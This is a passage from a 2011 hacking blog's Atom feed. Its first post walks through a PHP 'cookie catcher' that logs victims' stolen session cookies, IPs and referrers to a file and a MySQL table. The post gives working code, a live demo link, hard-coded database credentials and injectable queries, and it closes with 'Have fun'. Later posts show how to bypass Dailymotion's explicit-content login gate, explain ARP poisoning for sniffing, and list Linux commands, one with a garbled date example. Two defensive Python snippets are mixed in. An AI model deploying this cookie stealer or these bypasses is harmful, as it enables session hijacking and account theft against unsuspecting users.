Now let's break that piece of code down:&lt;br /&gt;
&lt;br /&gt;
Code&lt;br /&gt;
&lt;br /&gt;
&lt;?php&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This tells the server that this piece of code up to the&lt;br /&gt;
&lt;br /&gt;
Code&lt;br /&gt;
&lt;br /&gt;
?&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
is all php code.&lt;br /&gt;
&lt;br /&gt;
Code&lt;br /&gt;
&lt;br /&gt;
$cookie = $_GET['cookie'];&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This gets the cookie from the web browser using php's GET statement.&lt;br /&gt;
&lt;br /&gt;
Code&lt;br /&gt;
&lt;br /&gt;
$ip = $_SERVER['REMOTE_ADDR'];&lt;br /&gt;
$date=date(“j F, Y, g:i a”);&lt;br /&gt;
$referer=$_SERVER['HTTP_REFERER'];&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
REMOTE_ADDR is the user's IP Address.&lt;br /&gt;
date is the date the cookie was taken.&lt;br /&gt;
HTTP_REFERER is the site the user came from.&lt;br /&gt;
&lt;br /&gt;
Code&lt;br /&gt;
&lt;br /&gt;
$fp = fopen('cookies.html' 'a');&lt;br /&gt;
fwrite($fp, ‘Cookie: ‘.$cookie.’&lt;br /&gt;
IP: ‘ .$ip. ‘&lt;br /&gt;
Date and Time: ‘ .$date. ‘&lt;br /&gt;
Website: ‘.$referer.’&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
’);&lt;br /&gt;
fclose($fp);&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This piece of code does a couple of things. First it opens a file called cookies.html on the server. Then it writes the cookie info to the file (the cookie itself, date, and website the person came from). After that it adds three returns (&lt;br /&gt;
). Next it closes the file cookies.html.&lt;br /&gt;
&lt;br /&gt;
Code&lt;br /&gt;
&lt;br /&gt;
header (\"javascript:history.back()\");&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This last piece of code sends the user back to the last page they were on before they clicked on the link.&lt;br /&gt;
&lt;br /&gt;
Code&lt;br /&gt;
&lt;br /&gt;
?&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This, like stated earlier, ends the php script.&lt;br /&gt;
&lt;br /&gt;
There it is! You've made your very own cookie catcher for stealing cookies from people's browsers!&lt;br /&gt;
&lt;br /&gt;
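On the site whose cookies are targeted, the attribute that blunts a script like this is HttpOnly: a cookie set with it is not exposed to page scripts, so document.cookie has nothing to hand over. An added example in Python (not the article's code; the function names, cookie names and sample headers are constructed) that audits Set-Cookie headers for it:&lt;br /&gt;

```python
# Added example, not from the article. Cookie names and header values below
# are constructed samples.

def parse_set_cookie(header_value):
    """Split one Set-Cookie header value into (name, value, attributes)."""
    first, *rest = [part.strip() for part in header_value.split(";")]
    name, _sep, value = first.partition("=")
    attrs = {}
    for part in rest:
        if part:
            key, _sep, val = part.partition("=")
            # Attribute names are case-insensitive; flags have no value.
            attrs[key.strip().lower()] = val.strip()
    return name.strip(), value.strip(), attrs


def audit_set_cookie(header_value, served_over_https=True):
    """Return (cookie name, findings) for one Set-Cookie header value."""
    name, _value, attrs = parse_set_cookie(header_value)
    findings = []
    if "httponly" not in attrs:
        findings.append("no HttpOnly: page scripts can read it via document.cookie")
    if served_over_https and "secure" not in attrs:
        findings.append("no Secure: the browser will also send it over plain HTTP")
    return name, findings


def audit_response(set_cookie_values, session_names, served_over_https=True):
    """Audit only the cookies that carry a login session; map name to findings."""
    report = {}
    for header_value in set_cookie_values:
        name, findings = audit_set_cookie(header_value, served_over_https)
        if name in session_names and findings:
            report[name] = findings
    return report


SAMPLE_HEADERS = [  # constructed
    "PHPSESSID=abc123; path=/",
    "sid=9f8e7d; Path=/; Secure; HttpOnly; SameSite=Lax",
    "theme=dark; Expires=Wed, 01 Jan 2031 00:00:00 GMT",
]

if __name__ == "__main__":
    for cookie, problems in audit_response(SAMPLE_HEADERS, {"PHPSESSID", "sid"}).items():
        for problem in problems:
            print(cookie, "-", problem)
```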
Example Script:&lt;br /&gt;
&lt;br /&gt;
An example of this script in action is:&lt;br /&gt;
&lt;br /&gt;
http://www.bluechill.co.cc/cookietest.php&lt;br /&gt;
&lt;br /&gt;
http://www.bluechill.co.cc/cookies.php (view the cookies you've had from bluechill.co.cc in the last day.)&lt;br /&gt;
&lt;br /&gt;
It only shows cookies from your IP.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Have fun with your new found cookie catcher!&lt;br /&gt;
&lt;br /&gt;
Extras:&lt;br /&gt;
&lt;br /&gt;
Here is the source code for those pages (including a mysql database ;) )&lt;br /&gt;
&lt;br /&gt;
Cookietest.php:&lt;br /&gt;
&lt;br /&gt;
Code&lt;br /&gt;
&lt;br /&gt;
setcookie(\"Test\",\"Test Cookie For Cookie Catcher\",time()+3600);&lt;br /&gt;
echo \"Test Cookie: \";&lt;br /&gt;
echo $_COOKIE[\"Test\"];&lt;br /&gt;
echo \"&lt;br /&gt;
\";&lt;br /&gt;
?&amp;gt;&lt;br /&gt;
&lt;br /&gt;
document.write(\"&lt;br /&gt;
Code&lt;br /&gt;
&lt;br /&gt;
$ip = $_SERVER['REMOTE_ADDR'];&lt;br /&gt;
$con = mysql_connect(\"localhost\", \"USERNAME\", \"PASSWORD\");&lt;br /&gt;
$db = mysql_select_db(\"TABLENAME\");&lt;br /&gt;
$result = mysql_query(\"SELECT * FROM cookies WHERE IP = '$ip'\");&lt;br /&gt;
$i = 0;&lt;br /&gt;
while($row = mysql_fetch_array($result))&lt;br /&gt;
{&lt;br /&gt;
&amp;nbsp;&amp;nbsp; echo \"Cookie \" . $i . \"&lt;br /&gt;
&lt;br /&gt;
\";&lt;br /&gt;
&amp;nbsp;&amp;nbsp; echo \"Cookies: \" . $row['Cookies'] . \"&lt;br /&gt;
Site: \" . $row['Site'] . \"&lt;br /&gt;
Date: \" . $row['Date'] . \"&lt;br /&gt;
Your IP: \" . $row['IP'] . \"&lt;br /&gt;
&lt;br /&gt;
\";&lt;br /&gt;
&amp;nbsp;&amp;nbsp; echo \"&lt;br /&gt;
\";&lt;br /&gt;
&amp;nbsp;&amp;nbsp; $i++;&lt;br /&gt;
}&lt;br /&gt;
mysql_close($con);&lt;br /&gt;
?&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Cookiecatcher:&lt;br /&gt;
Code&lt;br /&gt;
&lt;br /&gt;
$cookie = $_GET['cookie'];&lt;br /&gt;
$ip = $_SERVER['REMOTE_ADDR'];&lt;br /&gt;
$date=date(\"Y-m-d\");&lt;br /&gt;
$referer=$_SERVER['HTTP_REFERER'];&lt;br /&gt;
mysql_connect(\"localhost\", \"USERNAME\", \"PASSWORD\");&lt;br /&gt;
mysql_select_db(\"TABLENAME\");&lt;br /&gt;
$sql_query = mysql_query(\"INSERT INTO cookies (Cookies,Site,Date,IP) VALUES ('$cookie','$referer','$date','$ip')\");&lt;br /&gt;
echo \"Cookie Entered Successfully\";&lt;br /&gt;
?&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Code for resetting database:&lt;br /&gt;
Code&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp; $con = mysql_connect(\"localhost\", \"bluechil_admin\", \"TonyHawk\");&lt;br /&gt;
&amp;nbsp;&amp;nbsp; $db = mysql_select_db(\"bluechil_cookies\");&lt;br /&gt;
&amp;nbsp;&amp;nbsp; $query = mysql_query(\"TRUNCATE TABLE cookies\");&lt;br /&gt;
&amp;nbsp;&amp;nbsp; mysql_close($con);&lt;br /&gt;
&amp;nbsp;&amp;nbsp; echo \"Table Reset!\";&lt;br /&gt;
?&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Have fun! :)
</content><link rel="replies" type="application/atom+xml" href="http://jaguargeek.blogspot.com/feeds/17416869103963400/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://jaguargeek.blogspot.com/2011/09/cookie-catcher.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3749417081738719676/posts/default/17416869103963400?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3749417081738719676/posts/default/17416869103963400?v=2" /><link rel="alternate" type="text/html" href="http://jaguargeek.blogspot.com/2011/09/cookie-catcher.html" title="Cookie Catcher" /><author><name>alphajatin</name><uri>http://www.blogger.com/profile/18215607019961941523</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="22" src="http://3.bp.blogspot.com/-W7BcgsI2r3Q/TWXKkq2V1NI/AAAAAAAAACI/dlla8CM4IMw/s220/161511_1019201717_4315499_n.jpg" /></author><thr:total>0</thr:total></entry><entry gd:etag="W/&quot;D0IFSXc4eip7ImA9WhdWFko.&quot;"><id>tag:blogger.com,1999:blog-3749417081738719676.post-586566439127767571</id><published>2011-09-10T22:55:00.000+05:30</published><updated>2011-09-10T22:55:18.932+05:30</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-09-10T22:55:18.932+05:30</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="web security" /><title>By-pass Dailymotion explicit content filter</title><content type="html">If you want to watch an "explicit content" video at &lt;a href="http://www.dailymotion.com/" target="_blank" title="autolink"&gt;www.dailymotion.com&lt;/a&gt; but don't feel like creating a user just for that reason, here's what you do.&lt;br /&gt;
&lt;br /&gt;
1. Go to the page that contains the video you want to see.&lt;br /&gt;
&lt;br /&gt;
2. In the URL, replace the part that says "www" with "iphone".&lt;br /&gt;
&lt;br /&gt;
For instance:&lt;br /&gt;
before:    &lt;a href="http://www.dailymotion.com/video/bla-bla-bla" target="_blank" title="autolink"&gt;http://www.dailymotion.com/video/bla-bla-bla&lt;/a&gt;&lt;br /&gt;
after:      &lt;a href="http://iphone.dailymotion.com/video/bla-bla-bla" target="_blank" title="autolink"&gt;http://iphone.dailymotion.com/video/bla-bla-bla&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Now you'll have access to the iphone version of that same page. It's  what you would see if you navigate to the first URL using an iPhone or  iPod Touch. &lt;br /&gt;
&lt;br /&gt;
3. Double click on the video thumbnail. This makes the video start  loading. You might have to double click the image again to make it play.&lt;br /&gt;
&lt;br /&gt;
4. Alternate between "play" and "pause" by double clicking the image.&lt;br /&gt;
&lt;br /&gt;
That's all nice and good, but the problem is that the video box is super tiny. No problem! Keep reading...&lt;br /&gt;
&lt;br /&gt;
5. Open "firebug".&lt;br /&gt;
&lt;br /&gt;
6. Run a search or manually find the following code snippet "embed width=100" (without the "quotes").&lt;br /&gt;
&lt;br /&gt;
7. Modify the width and height to be 1000 and 800 or something big like that.&lt;br /&gt;
&lt;br /&gt;
8. Enjoy! (Note that this will show the video's original size and not  stretched. It might be smaller than the regular non-iphone version of  the page).&lt;br /&gt;
&lt;br /&gt;
***Alternate Way***&lt;br /&gt;
&lt;br /&gt;
Do steps 1 and 2. &lt;br /&gt;
&lt;br /&gt;
3. View the source code for that page.&lt;br /&gt;
&lt;br /&gt;
4. Run a search for the keyword "auth" (without the "quotes"). It should only throw back one result.&lt;br /&gt;
&lt;br /&gt;
5. Copy the whole string that contains that keyword. It should look something like: &lt;br /&gt;
&lt;a href="http://proxy-63.dailymotion.com/video/538/713/21317835%3amp4_h264_aac.mp4?auth=1285078599-2ffdec30914540f317ce830fa9146425&amp;amp;cache=0" target="_blank" title="autolink"&gt;http://proxy-63.dailymotion.com/video/538/713/21317835%3amp4_h264_aac.mp4?auth=1285078599-2ffdec30914540f317ce830fa9146425&amp;amp;cache=0&lt;/a&gt;&lt;br /&gt;
This link is NSFW!!&lt;br /&gt;
&lt;br /&gt;
6. Paste that URL in a new tab.&lt;br /&gt;
&lt;br /&gt;
This will get you a page that only contains the video. The beauty of it  is that you can just go to "File - Save as" and download the file to  your hard drive.&lt;br /&gt;
Note: If you erase the question mark and everything else after it in the step 5 URL, you won't be able to access the site as you don't have permission. I don't know if these tokens expire, so it could be probable that the above link would throw a 403 or 404 Status Code by the time you read this article.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Moral of the story 1: You don't have to be an elite hacker to bend a site into doing what you want.&lt;br /&gt;
Moral of the story 2: Even huge sites like Dailymotion have these stupid  holes that allow users to get access to things they only want logged  users to see.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3749417081738719676-586566439127767571?l=jaguargeek.blogspot.com' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/jaguargeek?a=pfFytynON7A:Y4bdoXZFius:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/jaguargeek?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/jaguargeek?a=pfFytynON7A:Y4bdoXZFius:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/jaguargeek?i=pfFytynON7A:Y4bdoXZFius:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/jaguargeek?a=pfFytynON7A:Y4bdoXZFius:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/jaguargeek?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/jaguargeek?a=pfFytynON7A:Y4bdoXZFius:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/jaguargeek?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://jaguargeek.blogspot.com/feeds/586566439127767571/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://jaguargeek.blogspot.com/2011/09/by-pass-dailymotion-explicit-content.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3749417081738719676/posts/default/586566439127767571?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3749417081738719676/posts/default/586566439127767571?v=2" /><link rel="alternate" type="text/html" href="http://jaguargeek.blogspot.com/2011/09/by-pass-dailymotion-explicit-content.html" title="By-pass Dailymotion explicit content filter" /><author><name>alphajatin</name><uri>http://www.blogger.com/profile/18215607019961941523</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="22" src="http://3.bp.blogspot.com/-W7BcgsI2r3Q/TWXKkq2V1NI/AAAAAAAAACI/dlla8CM4IMw/s220/161511_1019201717_4315499_n.jpg" /></author><thr:total>0</thr:total></entry><entry gd:etag="W/&quot;CEcHSXo-cSp7ImA9WhdQEUg.&quot;"><id>tag:blogger.com,1999:blog-3749417081738719676.post-3429800823633573999</id><published>2011-08-12T17:57:00.000+05:30</published><updated>2011-08-12T17:57:18.459+05:30</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-08-12T17:57:18.459+05:30</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Networking" /><title>ARP Poisoning</title><content type="html">&lt;br /&gt;
- &lt;a href="http://www.hackthissite.org/articles/read/955##1"&gt;Difference between a switch and a hub&lt;/a&gt;&lt;br /&gt;
- &lt;a href="http://www.hackthissite.org/articles/read/955##2"&gt;What is ARP?&lt;/a&gt;&lt;br /&gt;
- &lt;a href="http://www.hackthissite.org/articles/read/955##3"&gt;What is ARP Poisoning?&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="" name="#1"&gt;&lt;b&gt;Difference between a switch and a hub&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
If you have a network running with a hub, there is no need for ARP Poisoning to sniff the network, because if you send information over a hubbed network, all computers will receive the data. The hub gets the information, and sends it out on all ports. But on a switched network only the destination computer gets the data. That means that your sniffer won't pick up anything, unless it is for you. The switch uses an addressing system called Media Access Control (MAC). Every computer has a MAC address. The switch holds and maintains a table that associates MAC addresses with certain ports, so that the info will only be sent to the given MAC address. A computer cannot communicate with another computer before it has its MAC address, simple as that. This is where the Address Resolution Protocol (ARP) comes in.&lt;br /&gt;
&lt;br /&gt;
&lt;a href="" name="#2"&gt;&lt;b&gt;What is ARP?&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Address Resolution Protocol (ARP) is a method for finding a host's MAC address when only the IP is known. If a computer wants to communicate with another computer over a network, it will first see if it already knows the MAC address; if not, it will send out an ARP request in order to get it. An ARP request is one of four types of messages in ARP, but the two main types are ARP request and ARP reply, which I will be covering in this article. The ARP request contains the sender's MAC address and IP, and it requests the MAC address of the given IP. The reason that it holds the sender's MAC and IP is so that the receiver can update his ARP cache with this information too, before he sends the reply with his MAC. Did I hear you ask what an ARP cache is? It is a temporary storage place on your computer that associates IP addresses of other computers with MAC addresses.&lt;br /&gt;
&lt;br /&gt;
&lt;a href="" name="#3"&gt;&lt;b&gt;What is ARP Poisoning?&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Now, if you want to sniff the network, you have to get the traffic to go through you. One way to do this is ARP Poisoning. The weakness is: all computers will accept an ARP reply, even if there never was an ARP request. In other words, you can send a customized ARP reply to your target computers, which will update their ARP cache with a new MAC address - yours. So when a computer wants to send something to another computer, it will find its MAC address in the ARP cache based on the IP - that MAC address is now your MAC address. So when it sends something to the MAC address, it sends it to you. But keep in mind, you have to send the packets on, or you will end up with a DoS. Another thing you have to think of is that from time to time the ARP cache of a computer gets flushed, if there is no traffic. So you have to send a new customized ARP reply to the targets like every 10th second or so, but this can be done automatically.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3749417081738719676-3429800823633573999?l=jaguargeek.blogspot.com' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
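Seen from the defending side, the weakness described in this article leaves two visible traces on the wire: replies that answer no recent request, and an IP whose claimed MAC suddenly changes. The Python code below is an added example, not part of the original article; it parses Ethernet/IPv4 ARP payloads and reports both signs. The addresses, the 2-second window and every name in it are assumptions, and the frames are constructed sample data.&lt;br /&gt;

```python
import struct

ARP_FMT = "!HHBBH6s4s6s4s"  # Ethernet/IPv4 ARP payload: 28 bytes
REQUEST, REPLY = 1, 2


def mac(raw):
    return ":".join("%02x" % b for b in raw)


def ip(raw):
    return ".".join(str(b) for b in raw)


def parse_arp(payload):
    """Return (op, sender_mac, sender_ip, target_mac, target_ip) or None."""
    size = struct.calcsize(ARP_FMT)
    body = payload[:size]  # captured frames may carry Ethernet padding
    if len(body) != size:
        return None
    htype, ptype, hlen, plen, op, sha, spa, tha, tpa = struct.unpack(ARP_FMT, body)
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return op, mac(sha), ip(spa), mac(tha), ip(tpa)


class ArpMonitor:
    """Tracks who asked for what and which MAC first claimed each IP."""

    def __init__(self, window=2.0):
        self.window = window  # seconds a request stays answerable (assumption)
        self.pending = {}     # (asker_ip, wanted_ip) -> time of the request
        self.bindings = {}    # ip -> first MAC seen for it

    def observe(self, ts, payload):
        parsed = parse_arp(payload)
        if parsed is None:
            return []
        op, s_mac, s_ip, _t_mac, t_ip = parsed
        alerts = []
        if op == REQUEST:
            self.pending[(s_ip, t_ip)] = ts
        elif op == REPLY and s_ip != t_ip:  # gratuitous announcements skip this check
            asked_at = self.pending.pop((t_ip, s_ip), None)
            if asked_at is None or ts - asked_at > self.window:
                alerts.append(("unsolicited-reply",
                               "%s told that %s is at %s" % (t_ip, s_ip, s_mac)))
        # Requests and replies both carry a sender binding that receivers cache.
        known = self.bindings.setdefault(s_ip, s_mac)
        if known != s_mac:
            alerts.append(("binding-conflict",
                           "%s was %s, now claimed by %s" % (s_ip, known, s_mac)))
        return alerts


def sample_arp(op, s_mac, s_ip, t_mac, t_ip):
    """Pack constructed test input in memory; nothing is sent on a network."""
    to_mac = lambda m: bytes.fromhex(m.replace(":", ""))
    to_ip = lambda a: bytes(int(part) for part in a.split("."))
    return struct.pack(ARP_FMT, 1, 0x0800, 6, 4, op,
                       to_mac(s_mac), to_ip(s_ip), to_mac(t_mac), to_ip(t_ip))


# Constructed addresses (documentation IP range, locally administered MACs).
HOST = ("02:00:00:00:00:05", "192.0.2.5")
GATEWAY = ("02:00:00:00:00:01", "192.0.2.1")
OTHER_MAC = "02:00:00:00:00:66"
ZERO_MAC = "00:00:00:00:00:00"

# Constructed trace: one normal request/reply, then repeated unrequested replies.
SAMPLE_TRACE = [
    (0.0, sample_arp(REQUEST, HOST[0], HOST[1], ZERO_MAC, GATEWAY[1])),
    (0.1, sample_arp(REPLY, GATEWAY[0], GATEWAY[1], HOST[0], HOST[1])),
    (10.0, sample_arp(REPLY, OTHER_MAC, GATEWAY[1], HOST[0], HOST[1])),
    (20.0, sample_arp(REPLY, OTHER_MAC, GATEWAY[1], HOST[0], HOST[1])),
]


def run_sample():
    monitor = ArpMonitor()
    return [(ts, monitor.observe(ts, frame)) for ts, frame in SAMPLE_TRACE]


if __name__ == "__main__":
    for ts, alerts in run_sample():
        for kind, detail in alerts:
            print("%5.1fs %-17s %s" % (ts, kind, detail))
```

The monitor keeps the first MAC it saw for each IP, so the repeated replies in the sample keep raising alerts instead of becoming the new baseline.&lt;br /&gt;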
&lt;a href="http://feeds.feedburner.com/~ff/jaguargeek?a=7oSlGHdUsMY:AdOLEmhINIo:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/jaguargeek?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/jaguargeek?a=7oSlGHdUsMY:AdOLEmhINIo:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/jaguargeek?i=7oSlGHdUsMY:AdOLEmhINIo:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/jaguargeek?a=7oSlGHdUsMY:AdOLEmhINIo:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/jaguargeek?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/jaguargeek?a=7oSlGHdUsMY:AdOLEmhINIo:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/jaguargeek?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://jaguargeek.blogspot.com/feeds/3429800823633573999/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://jaguargeek.blogspot.com/2011/08/arp-poisoning.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3749417081738719676/posts/default/3429800823633573999?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3749417081738719676/posts/default/3429800823633573999?v=2" /><link rel="alternate" type="text/html" href="http://jaguargeek.blogspot.com/2011/08/arp-poisoning.html" title="ARP Poisoning" /><author><name>alphajatin</name><uri>http://www.blogger.com/profile/18215607019961941523</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="22" src="http://3.bp.blogspot.com/-W7BcgsI2r3Q/TWXKkq2V1NI/AAAAAAAAACI/dlla8CM4IMw/s220/161511_1019201717_4315499_n.jpg" /></author><thr:total>0</thr:total></entry><entry gd:etag="W/&quot;C0UMSHw5eip7ImA9WhdQEUg.&quot;"><id>tag:blogger.com,1999:blog-3749417081738719676.post-92657359500582765</id><published>2011-08-12T17:44:00.000+05:30</published><updated>2011-08-12T17:44:49.222+05:30</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-08-12T17:44:49.222+05:30</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Ubuntu" /><title>Basic Linux Commands</title><content type="html">All of the following commands should work from your terminal, regardless what shell you are using.&lt;br /&gt;
&lt;br /&gt;
If you need help understanding the command more thoroughly, or its options, try adding --help to the end of your command. Example: Say you need help with the command "date," you would do "date --help"&lt;br /&gt;
&lt;br /&gt;
Here are some basic linux commands:&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;cd&lt;/b&gt;. You use cd to change directories. Type cd followed by the  name of a directory to access that directory. Keep in mind that you are  always in a directory and allowed access to any directories  hierarchically above or below. Example: cd games&lt;br /&gt;
If your directory games is not located hierarchically below the current directory, then you may use either of the following examples:&lt;br /&gt;
cd /usr/games&lt;br /&gt;
cd ../games&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;clear&lt;/b&gt;. Use clear to clear the terminal. Type clear to clean up  your terminal window. This is especially helpful when you are typing  lots of commands and need a clean window to help you focus. Example:  clear&lt;br /&gt;
This is also useful when you are getting ready to type a rather long  command or a command with a rather long output and do not wish to become  confused or distracted by other details on the screen.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;date&lt;/b&gt;. Use date to set your server's date and time. Type date  followed by the two digit month, the two digit date, the two digit time,  and two digit minutes. The syntax is easy enough and resembles this:  MMDDhhmm&lt;br /&gt;
This command is helpful but must be used when superuser or logged in as  root. Otherwise you will get an "Operation not permitted" output. As  root or superuser, you can execute the command such as:&lt;br /&gt;
date 04231839&lt;br /&gt;
The above command will set the server date and time to the fourth month (April), the eighth day, at 5:39 PM.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;df&lt;/b&gt;. Use df to check disk space. Typing df provides a very quick  check of your file system disk space. Type df -h to get a more easily  readable version of the output. Notice that this command will include  all application storage such as your hard disk/s (hda, hdb, etc.) and  your server SWAP file (shm). To list disk space including file system  type, execute the following command: df -h -T&lt;br /&gt;
You could also combine -h -T by using df -hT&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;finger&lt;/b&gt;. Use finger to see who is on the system. Typing finger  allows you to see who else is on the system or get detailed information  about a person who has access to the system. Type finger followed by the  name of a user's account to get information about that user. Or, type  finger and press enter to see who is currently on the system and what  they are currently doing. Example: finger johndoe&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;logout&lt;/b&gt;. Yep, you guessed it, typing logout will log your account  out of the system. Type logout at the prompt to disconnect from your  linux machine or to logout a particular user session from the system.  Keep in mind that although rudimentary, leaving your critical account  logged on may be a security concern. I always recommend promptly using  logout when you are finished using your root account. Example: logout&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;ls&lt;/b&gt;. Use ls to list files and directories. Type ls to see a list of the files and directories located in the current directory. If you are in the directory named games and you execute ls, a list will appear that contains files in the games directory and sub-directories that are in the games directory. Examples:&lt;br /&gt;
ls Mail&lt;br /&gt;
ls /usr/bin&lt;br /&gt;
Type ls -alt to see a list of all files (including .rc files) and all  directories located in the current directory. The listing will include  detailed, and often useful information. Examples:&lt;br /&gt;
ls -alt&lt;br /&gt;
ls -alt /usr/bin&lt;br /&gt;
If the screen flies by and you miss seeing a number of files, try using the |more at the end like:&lt;br /&gt;
ls -alt |more&lt;br /&gt;
* In bash, (linux shell) often the abbreviated command "L" is available.  To get a verbose listing of files and directories, you could therefore  simply type: l&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;man&lt;/b&gt;. Use man to pull up information about a linux command. Type  man followed by a command to get detailed information about how to use  the command. Example: man ls&lt;br /&gt;
Type man -k followed by a word to list all of the commands and  descriptions that contain the word you specified. Example: man -k finger&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;more&lt;/b&gt;. Use more to read the contents of a file. Type more followed  by the name of a text file to read the file's contents. Why do I  emphasize using this on a text file? Because most other types of files  will look like garbage that you will probably not understand. Example:  more testfile.txt&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;nano&lt;/b&gt;. Use nano to start a text editor. Typing nano will start a basic text editor on most linux systems. Type nano followed by the filename you wish to edit. This basic editor is quick and easy to use for beginners. However, it is very important that you also learn about other text editors available on linux and UNIX systems. I searched for a page on three other text editors: vi, pico, and emacs. You may go to http://www.reallylinux.com/docs/editors/editor.shtml to learn about those.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;passwd&lt;/b&gt;. Use passwd to change your current password. Type passwd  and press enter. You will see the message "Changing password for  username."&lt;br /&gt;
At the old password: prompt, type in your old password.&lt;br /&gt;
Then, at the enter new password: prompt, type in your new password.&lt;br /&gt;
The system double checks your new password just in case you made a typo  the first time typing it. Beside the verify: prompt, type your new  password again. You may also change other user's passwords with this.  Just use "passwd theirusername". Although, this does require root to  change other's passwords.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;pwd&lt;/b&gt;. Use pwd to print the name of your current working directory.  Type pwd and hit enter. You will see the full name of the directory you  are currently in. This is your directory path and is very handy. This  is especially handy when you forget what directory you have changed to  and are trying to run other commands.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3749417081738719676-92657359500582765?l=jaguargeek.blogspot.com' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
